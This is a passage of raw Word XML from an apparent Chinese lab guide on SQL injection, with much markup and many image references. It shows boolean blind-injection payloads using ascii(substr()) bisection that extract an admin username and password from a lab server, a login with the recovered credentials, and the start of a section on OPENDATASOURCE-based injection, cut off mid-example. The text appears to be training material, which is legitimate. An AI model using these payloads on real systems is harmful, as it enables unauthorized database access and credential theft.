          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F316E9F" wp14:editId="566DAA32">
            <wp:extent cx="5267325" cy="2819400"/>
            <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
            <wp:docPr id="102" name="图片 25" descr="http://erange.heetian.com/server/files/upload/guidebook/image/eef919f8-3868-4f4f-bcd5-3e3241d08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range.heetian.com/server/files/upload/guidebook/image/eef919f8-3868-4f4f-bcd5-3e3241d087aa.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId160"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5267325" cy="2819400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="559E76E8"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经过猜测，存在pwd字段，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B44850A" w14:textId="77777777" w:rsidR="00276D91" w:rsidRDefault="001564B2" w:rsidP="00200887">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48271150" wp14:editId="1DCFF90A">
            <wp:extent cx="5267325" cy="2343150"/>
            <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
            <wp:docPr id="103" name="图片 28" descr="http://erange.heetian.com/server/files/upload/guidebook/image/1bc2faa6-5cee-43b4-a1f0-38b0a766c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range.heetian.com/server/files/upload/guidebook/image/1bc2faa6-5cee-43b4-a1f0-38b0a766c1d6.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId161"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5267325" cy="2343150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB0938B" w14:textId="77777777" w:rsidR="001564B2" w:rsidRPr="00CD76A0" w:rsidRDefault="001564B2" w:rsidP="0020088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6</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.接下来采用ASCII码折半法猜解管理员帐号和密码判断管理员帐号的长度</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67191D33" w14:textId="77777777" w:rsidR="001564B2" w:rsidRPr="00CD76A0" w:rsidRDefault="006472F7" w:rsidP="00901209">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r w:rsidR="001564B2" w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>and (select count(*) from admin where length(name)&gt;=5)=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49822856"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说明：length()函数用于求字符串的长度，此处猜测用户名的长度和5比较，即猜测是否由5个字符组成</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215239EB" w14:textId="77777777" w:rsidR="00276D91" w:rsidRDefault="001564B2" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E91B957" wp14:editId="47802E19">
            <wp:extent cx="5267325" cy="2305050"/>
            <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
            <wp:docPr id="104" name="图片 31" descr="http://erange.heetian.com/server/files/upload/guidebook/image/246bd00d-e130-4c0d-88b0-fd6920ce4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range.heetian.com/server/files/upload/guidebook/image/246bd00d-e130-4c0d-88b0-fd6920ce424c.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId162"/>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14:paraId="6A84BB91"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7</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.and (select count(*) from admin where ascii(substr(name,1,1))&gt;=97)=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011CA9A8"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说明：substr()函数用于截取字符串，ascii()函数用于获取字符的ascii码，此处的意思是截取name字段的第一个字符，获取它的ascii码值，查询ascii码表可知97为字符a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A54ECC" w14:textId="77777777" w:rsidR="001564B2" w:rsidRPr="001564B2" w:rsidRDefault="001564B2" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B7559B7" wp14:editId="7FFF72C8">
            <wp:extent cx="5274310" cy="2123053"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="105" name="图片 34" descr="http://erange.heetian.com/server/files/upload/guidebook/image/c367bb1b-2eb7-4844-aa95-dc647a6a4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range.heetian.com/server/files/upload/guidebook/image/c367bb1b-2eb7-4844-aa95-dc647a6a40f4.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId163"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2123053"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CCCDDD" w14:textId="77777777" w:rsidR="00276D91"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and (select count(*) from admin where ascii(substr(name,2,1))&gt;=100)=1 结果为100，即字符d，重复上述过程，可以判断出帐号为admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47026FDA" w14:textId="77777777" w:rsidR="001564B2" w:rsidRDefault="001564B2" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05E3506E" wp14:editId="7C91437B">
            <wp:extent cx="5267325" cy="2219325"/>
            <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
            <wp:docPr id="106" name="图片 37" descr="http://erange.heetian.com/server/files/upload/guidebook/image/9b78169d-d1d4-4f0a-96a1-35093b474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range.heetian.com/server/files/upload/guidebook/image/9b78169d-d1d4-4f0a-96a1-35093b47484c.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId164"/>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14:paraId="4389CC7F"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8.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>相同方法猜解密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1876F6DC" w14:textId="77777777" w:rsidR="001564B2" w:rsidRPr="00CD76A0" w:rsidRDefault="006472F7" w:rsidP="00901209">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="555555"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r w:rsidR="001564B2" w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> and (select count(*) from admin where length(pwd)&gt;=8)=1，返回正常，即密码长度为8，此时可以判断密码应该为明文</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E91DC8" w14:textId="77777777" w:rsidR="001564B2" w:rsidRDefault="001564B2" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BD6B660" wp14:editId="271F61E9">
            <wp:extent cx="5274310" cy="2180175"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="107" name="图片 40" descr="http://erange.heetian.com/server/files/upload/guidebook/image/c6d66abd-2b6f-473f-9de1-253035a7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range.heetian.com/server/files/upload/guidebook/image/c6d66abd-2b6f-473f-9de1-253035a75592.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId165"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2180175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="58283C8C" w14:textId="77777777" w:rsidR="001564B2" w:rsidRPr="00CD76A0" w:rsidRDefault="001564B2"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and (select count(*) from admin where ascii(substr(pwd,1,1))&gt;=97)=1，返回正常，为字符a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA7BE39" w14:textId="77777777" w:rsidR="00F13FF6" w:rsidRDefault="00F13FF6" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79FBE3CF" wp14:editId="4F5F76EE">
            <wp:extent cx="5267325" cy="2057400"/>
            <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
            <wp:docPr id="108" name="图片 43" descr="http://erange.heetian.com/server/files/upload/guidebook/image/cfc53f37-d07e-40b4-aae7-95de26f75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range.heetian.com/server/files/upload/guidebook/image/cfc53f37-d07e-40b4-aae7-95de26f75b83.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId166"/>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p w14:paraId="303951BF" w14:textId="77777777" w:rsidR="00F13FF6"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rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>and (select count(*) from admin where ascii(substr(pwd,2,1))&gt;=100)=1，返回正常，为字符d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2201D957" w14:textId="77777777" w:rsidR="00F13FF6"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重复操作......</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFBA6FD" w14:textId="77777777" w:rsidR="00F13FF6"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and (select count(*) from admin where ascii(substr(pwd,8,1))&gt;=56)=1，返回正常，为数字8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4041FD38" w14:textId="77777777" w:rsidR="00F13FF6" w:rsidRDefault="00F13FF6" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C6276AF" wp14:editId="086FD279">
            <wp:extent cx="5267325" cy="2047875"/>
            <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
            <wp:docPr id="109" name="图片 46" descr="http://erange.heetian.com/server/files/upload/guidebook/image/a6de0a3f-09fd-4ae4-80ca-7154eb9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range.heetian.com/server/files/upload/guidebook/image/a6de0a3f-09fd-4ae4-80ca-7154eb946733.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId167"/>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14:paraId="3E9C27DC" w14:textId="77777777" w:rsidR="00F13FF6"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Pr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="555555"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>完成上述操作可以确定帐号为：admin密码为:admin888</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B1E696" w14:textId="77777777" w:rsidR="00F13FF6"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打开http://10.1.1.59/login.jsp，输入猜解出的用户名和密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE7BCCB" w14:textId="77777777" w:rsidR="00F13FF6" w:rsidRPr="00F13FF6" w:rsidRDefault="00F13FF6" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44EA1697" wp14:editId="63718641">
            <wp:extent cx="5267325" cy="1495425"/>
            <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
            <wp:docPr id="110" name="图片 49" descr="http://erange.heetian.com/server/files/upload/guidebook/image/20d91ca7-90a9-4565-bc0b-205b8e8f4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range.heetian.com/server/files/upload/guidebook/image/20d91ca7-90a9-4565-bc0b-205b8e8f4e24.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId168"/>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14:paraId="2B428958" w14:textId="77777777" w:rsidR="00276D91" w:rsidRPr="00CD76A0" w:rsidRDefault="00F13FF6"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提示登录成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329BC764" w14:textId="77777777" w:rsidR="007910D3" w:rsidRDefault="00F13FF6" w:rsidP="00200887">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15385EEE" wp14:editId="2E9E98D8">
            <wp:extent cx="5274310" cy="1580389"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="111" name="图片 52" descr="http://erange.heetian.com/server/files/upload/guidebook/image/9097671b-2b33-4067-8c08-f71721c95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range.heetian.com/server/files/upload/guidebook/image/9097671b-2b33-4067-8c08-f71721c952d9.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId169"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="1580389"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3D19AD" w14:textId="77777777" w:rsidR="006F4B98" w:rsidRPr="00366D12" w:rsidRDefault="00951D74" w:rsidP="00951D74">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>.2</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00213E70" w:rsidRPr="00366D12">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>突破关闭</w:t>
      </w:r>
      <w:r w:rsidR="00330FF8" w:rsidRPr="00366D12">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>错误</w:t>
      </w:r>
      <w:r w:rsidR="00213E70" w:rsidRPr="00366D12">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>回显的盲注</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0ECD3A" w14:textId="77777777" w:rsidR="00A103ED" w:rsidRPr="00CD76A0" w:rsidRDefault="00A103ED" w:rsidP="00FF1B9E">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猜SQL数据的时候原理不外乎两种。一个是对方的WEB服务器在没有关闭错误提示的时候是用让SQL出错来暴出想要的信息；一个是在对方的WEB服务器关闭错误提示的时候采用ASCII码拆半分法分析。当关闭错误提示的时候，这时来猜数据就很慢了，遇到网速蜗牛的时候真是急死人，如以前的NBSI还经常会出现猜解错误是否要重试的警告对话框。如果我来告诉你，有了</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>opendatasource</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>openrowset</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这两个函数，一切问题都应刃而解了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE3F991" w14:textId="77777777" w:rsidR="00A103ED" w:rsidRPr="00CD76A0" w:rsidRDefault="00A103ED"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SQL联机从书的解释中，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对没有定义为链接服务器名称的 OLE DB 数据源执行不常用</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>查询时，使用特殊名称。在 SQL Server 2000 中，OPENROWSET 和 OPENDATASOURCE 函数提供了连接信息，借以从 OLE DB 数据源访问数据。OPENROWSET 和 OPENDATASOURCE 只应在引用不常访问的 OLE DB 数据源时使用。对于需要经常访问的数据源，应定义链接服务器。无论 OPENDATASOURCE 还是 OPENROWSET 都不能提供链接服务器定义的全部功能，包括安全管理和查询目录信息的能力。每次调用这些函数时，都必须提供所有的连接信息（包括密码）。OPENROWSET 和 OPENDATASOURCE 看起来象函数，但其实是宏并且不支持将 Transact-SQL 变量提供为参数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEA252A" w14:textId="77777777" w:rsidR="00A103ED" w:rsidRPr="00CD76A0" w:rsidRDefault="00A103ED"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简单来讲，这两个宏也就是不依靠链接服务器来进行分布式查循。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A08EE7" w14:textId="77777777" w:rsidR="00200887" w:rsidRPr="006472F7" w:rsidRDefault="00A103ED"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因为用</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>openrowset</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>函数来直接获取注入数据库的信息的工具已经有了，我就不做详细介绍了。联机从书对</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>OPENDATASOURCE</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>宏的用法示例格式如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01971B2C" w14:textId="77777777" w:rsidR="00444716" w:rsidRDefault="00D269A4" w:rsidP="006472F7">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:pict w14:anchorId="155A5BC8">
          <v:shape id="_x0000_s1026" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:22.35pt;margin-top:5.25pt;width:373.6pt;height:124.8pt;z-index:251660288">
            <v:textbox style="mso-next-textbox:#_x0000_s1026">
              <w:txbxContent>
                <w:p w14:paraId="76B9846C" w14:textId="77777777" w:rsidR="003756DA" w:rsidRDefault="003756DA" w:rsidP="00A103ED">
                  <w:pPr>
                    <w:ind w:firstLine="420"/>
                  </w:pPr>
                  <w:r>
                    <w:t>SELECT   *</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="461A0FCE" w14:textId="77777777" w:rsidR="003756DA" w:rsidRDefault="003756DA" w:rsidP="00A103ED">
                  <w:pPr>
                    <w:ind w:firstLine="420"/>
                  </w:pPr>
                  <w:r>
                    <w:t xml:space="preserve">FROM      </w:t>
                  </w:r>
                  <w:r w:rsidRPr="00797B42">
                    <w:t>OPENDATASOURCE</w:t>
                  </w:r>
                  <w:r>
                    <w:t>(</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="70DD3351" w14:textId="77777777" w:rsidR="003756DA" w:rsidRDefault="003756DA" w:rsidP="00A103ED">
                  <w:pPr>
                    <w:ind w:firstLine="420"/>
                  </w:pPr>
                  <w:r>
                    <w:t xml:space="preserve">         'SQLOLEDB',</w:t>
                  </w:r>
                </w:p>
